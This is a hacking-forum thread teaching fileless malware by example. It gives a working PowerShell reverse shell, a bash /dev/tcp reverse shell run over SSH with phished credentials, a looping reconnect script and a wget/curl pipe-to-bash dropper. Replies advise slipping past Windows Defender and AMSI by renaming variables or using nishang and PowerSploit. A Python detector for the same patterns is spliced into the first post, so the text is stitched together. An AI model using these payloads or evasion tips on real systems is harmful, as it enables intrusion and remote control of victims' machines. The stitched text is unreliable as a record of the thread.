Fileless Malware
#1
Fileless Malware
 Fileless malware is a simple yet dangerous threat. It renders some network defenses ineffective. But what is fileless malware? The dictionary definition (simplified) is that it's malicious code that exists only in memory. For our non-technical readers that means that the code isn't ever a .exe that you execute or anything like that. But the dictionary definition is boring and not really accurate anyway. My definition is "malicious code that primarily operates in RAM." Note the keyword "primarily" in there. Not all fileless malware is 100% fileless. But let's stop flipping through the dictionary and look at some examples. I'm more the type to teach by examples and analogies after all.
 
 I'll start by giving you an example of some fileless malware (don't worry it's not going to hurt you).
Code:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
 
 This powershell command is a reverse TCP shell. It is technically a fileless malware sample. It is executed straight from the command line or via an exploit. There are other ways to run code of course, but those are some common ones for this particular sample. This little powershell one liner is nice for a few reasons. Antivirus products don't have a chance to scan a file for malicious code, because there is no file to be scanned. In addition to that very convenient feature is the fact that this is incredibly easy to modify. That's one of the good things about scripting languages like powershell, python, etc. They are easy to modify, obfuscate, and add features to. Next we get into the nitty gritty details of how an attack utilizing fileless malware would look.
 
[Image: fileless-attack-kill-chain.png]
 
 The illustration above is an excellent example of a fileless malware attack, courtesy of our friends at McAfee. The limit to fileless attacks is your imagination though. Don't get caught up in the examples. Let's create our very own fileless malware attack. Put on your APT hats. We're going to be operating on Linux since that's my main system's OS and Linux provides an abundance of tools for fileless attacks. We're going to be doing our delivery through the amazing SSH protocol. Let's say we phished some SSH credentials from a naive user. Set up a netcat listener on your system with the following command.
Code:
$ ncat -lkv 31337
 
Use whatever port you want of course. Now on our "victim machine" we will execute a reverse shell. Simple I know, but we're starting bare-bones and building up. To execute the reverse shell, enter the following (also on your system):
Code:
ssh user@compromised.host "bash -i >& /dev/tcp/<yourIP>/<yourPort> 0>&1"
 
 Reverse shell back to you. Not very interesting, but effective and also fileless. We haven't touched the target system disk. Let's whip up a little shell script and make this more interesting. The script below is our main payload. Every 30 seconds it connects back and gives us a shell. It also ignores the SIGINT signal. So if you press Ctrl + c by accident you don't kill it.
 
Code:
#!/bin/bash
# Ignore Ctrl+C and terminal hangup so an accidental keypress does not kill the loop.
trap ":" SIGINT SIGHUP
# Reconnect every 30 seconds; "true" must be lowercase, "True" is not a shell command.
while true; do
    bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
    sleep 30
done
 
But rather than executing this directly, we'll use this one liner:
Code:
whereis wget && (wget -O - http://localhost:8888/test.sh | bash &) || whereis curl && (curl -o - http://localhost:8888/test.sh | bash &)
 
So to drop the payload we simply execute the one liner via SSH. 
Code:
ssh user@compromised.system "whereis wget && (wget -O - http://localhost:8888/test.sh | bash &) || whereis curl && (curl -o - http://localhost:8888/test.sh | bash &)"
 
 This attack is simple enough. But it never touched the disk. The SSH command just downloaded and ran the code. Of course as with any attack of this nature, if the system you're attacking gets turned off then you're screwed. And a persistence mechanism will make the fileless attack less fileless in all likelihood. Powershell, WMI, Mshta.exe, and other Windows tools are also used in fileless malware attacks.
 
If you want to learn more about fileless malware attacks I highly recommend reading this post from Cybereason: Cybereason: Fileless Malware. A specific example of an advanced fileless malware attack is Operation Cobalt Kitty: Operation Cobalt Kitty. I haven't fully looked into it. An APT compromised a corporate network and remained there for an entire year, which is pretty impressive. Even more interesting though, is that they used publicly available tools that you may be familiar with to carry out the attack. They used payloads from Cobalt Strike, nishang, and PowerSploit. So for those of you who think that all this is just a game, some of the most advanced APTs use the same tools as you. I hope you enjoyed reading about this. If you have any questions, comments or smart remarks just post below.
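As an added, defender-side example that is not part of the thread: a small Python scanner that flags the fileless-execution patterns quoted in this post (PowerShell TCPClient/iex one-liners, base64 -EncodedCommand, bash /dev/tcp, and download-to-stdout piped into a shell) in process command lines. The rule names and the sample log lines are constructed for the example, not real telemetry.

```python
import base64
import re

# One rule per fileless pattern seen in the thread: (name, regex over the command line).
RULES = [
    ("ps_reverse_tcp", re.compile(r"New-Object\s+System\.Net\.Sockets\.TCPClient", re.I)),
    ("ps_iex_no_profile", re.compile(r"powershell(\.exe)?\s.*-nop\b.*\biex\b", re.I)),
    ("ps_encoded", re.compile(r"powershell(\.exe)?\s.*-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("bash_dev_tcp", re.compile(r"bash\s+-i\s+>&\s*/dev/tcp/")),
    ("download_to_shell", re.compile(r"(wget\s+-O\s*-|curl\s+(-o\s*-|-s\b)).*\|\s*(ba)?sh\b")),
]

def decode_encoded_command(cmdline):
    """Plaintext of a PowerShell -EncodedCommand argument, or None.
    The argument is base64 of UTF-16LE text, so a plain base64 decode is not enough."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(cmdline):
    """Names of the rules a command line triggers. The decoded -EncodedCommand
    payload (if any) is appended so that base64 alone does not hide 'iex'."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + " " + decoded
    return [name for name, rx in RULES if rx.search(text)]

def scan(lines):
    """(line, matched_rules) for every line that triggers at least one rule."""
    return [(line, hits) for line in lines if (hits := classify(line))]

# Constructed sample of process command lines (made up for this example).
ENCODED = base64.b64encode(
    "$sendback = (iex $data 2>&1 | Out-String)".encode("utf-16-le")).decode()
SAMPLE_LOG = [
    "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);"
    "$sendback = (iex $data 2>&1 | Out-String)\"",
    "powershell -nop -w hidden -enc " + ENCODED,            # same payload, base64-wrapped
    "ssh user@compromised.host \"bash -i >& /dev/tcp/10.0.0.1/31337 0>&1\"",
    "wget -O - http://localhost:8888/test.sh | bash &",
    "curl -s https://example.invalid/api/v1/status | jq .",  # benign: no shell sink
    "powershell -nop -c Get-Process",                         # benign: no iex / sockets
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_LOG):
        print(", ".join(hits), "<-", line[:70])
```

Expanding the encoded form before matching is the point: the thread's one-liner trips the same rules whether it is passed plainly or via -EncodedCommand.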
#2
Very interesting thread Dismal.

I've heard of fileless malware before but I could never wrap my head around this concept. But you've explained it very well here. What I wonder sometimes is: how does one achieve persistence using fileless malware? But I suppose it's like you say, adding persistence will make it less fileless... This is a good way to attack high value targets like APTs do, rather than blindly infecting home users with botnets and ransomware.

I do have a question about one of the payloads here though. It's been a while since I've used Linux as my home environment so...
Code:
wget -O - http://localhost:8888/test.sh | bash &

Using wget here, wouldn't wget download this bash script directly to the disk somewhere? Or will the pipeline to bash only download it to memory?
#3
(05-16-2020, 10:38 PM)Insider Wrote: Very interesting thread Dismal.

I've heard of fileless malware before but I could never wrap my head around this concept. But you've explained it very well here. What I wonder sometimes is: how does one achieve persistence using fileless malware? But I suppose it's like you say, adding persistence will make it less fileless... This is a good way to attack high value targets like APTs do, rather than blindly infecting home users with botnets and ransomware.

I do have a question about one of the payloads here though. It's been a while since I've used Linux as my home environment so...
Code:
wget -O - http://localhost:8888/test.sh | bash &

Using wget here, wouldn't wget download this bash script directly to the disk somewhere? Or will the pipeline to bash only download it to memory?
 
The -O - means pipe output to stdout. So it goes straight to bash and doesn't touch the disk. Curl can do the same with "-o -". Good question though. And yes, once you introduce persistence it's very difficult to stay fileless. I'm not going to say impossible, but I have no idea how you do it. Every fileless malware sample I've heard of writes to disk in some form for persistence.
#4
Darn, PowerShell doesn't like my code :)
[Image: m2YEcPY.png]

Tried base64 too.
[Image: XQmfP8P.png]
#5
(05-17-2020, 05:59 PM)Insider Wrote: Darn, PowerShell doesn't like my code :)
[Image: m2YEcPY.png]

Tried base64 too.
[Image: XQmfP8P.png]
 
I couldn't see the picture that well. But if that's the one liner from the post, I don't really have any idea if it works.
#6
(05-17-2020, 08:40 PM)Dismal_0x8 Wrote: I couldn't see the picture that well. But if that's the one liner from the post, I don't really have any idea if it works.

It's the one-liner from the thread. But after some research I believe we need to bypass "AMSI" first.
https://0x00-0x00.github.io/research/201...-code.html
#7
(05-17-2020, 08:47 PM)Insider Wrote:
(05-17-2020, 08:40 PM)Dismal_0x8 Wrote: I couldn't see the picture that well. But if that's the one liner from the post, I don't really have any idea if it works.

It's the one-liner from the thread. But after some research I believe we need to bypass "AMSI" first.
https://0x00-0x00.github.io/research/201...-code.html
 
I just saw what the error actually said haha. Yeah, that's Windows Defender I'm fairly sure. It probably just detected some part of the command. Just try changing variable names. Or you could always just go check out nishang and/or PowerSploit. They have some good payloads and AV bypass functions.